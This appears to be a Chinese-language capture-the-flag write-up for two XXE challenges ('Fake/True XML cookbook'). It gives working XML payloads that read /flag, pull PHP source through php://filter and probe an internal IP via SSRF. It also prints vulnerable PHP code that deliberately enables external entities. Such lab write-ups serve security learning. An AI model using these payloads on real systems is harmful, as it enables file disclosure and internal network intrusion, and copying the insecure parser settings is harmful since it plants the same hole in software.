Fake XML cookbook

直接改POST即可。注入一个恶意的外部实体，使用file协议，根据题目提示读取flag。
payload：

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE username [
    <!ENTITY file SYSTEM "file:///flag">
 ]>
<user><username>&file;</username><password>456</password></user>

True XML cookbook

和上一题一样的界面，再次输入上提的payload：

根据提示，感觉flag在/var/www/html/doLogin.php这里。。xxe读源码：

<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY file SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/doLogin.php">
 ]>
<user><username>&file;</username><password>456</password></user>

解码后得到：

<?php
/**
* autor: c0ny1
* date: 2018-2-7
*/

$USERNAME = 'admin'; //账号
$PASSWORD = '024b87931a03f738fff6693ce0a78c88'; //密码
$result = null;

libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');

try{
	$dom = new DOMDocument();
	$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
	$creds = simplexml_import_dom($dom);

	$username = $creds->username;
	$password = $creds->password;

	if($username == $USERNAME && $password == $PASSWORD){
		$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
	}else{
		$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
	}	
}catch(Exception $e){
	$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
}

header('Content-Type: text/html; charset=utf-8');
echo $result;
?>

emm没什么发现，但是读取源码的payload我还是在这里记录一哈。
看了别人的WP，不过我这里不好使。。：

只能想到利用xxe进行ssrf打内网，扫描一下内网ip的几个文件：/etc/hosts，/proc/net/arp，/proc/net/fib_trie

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
 <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://192.168.1.8">
 ]>

<user><username>&xxe;</username><password>123</password></user>

nikoeurus.github.io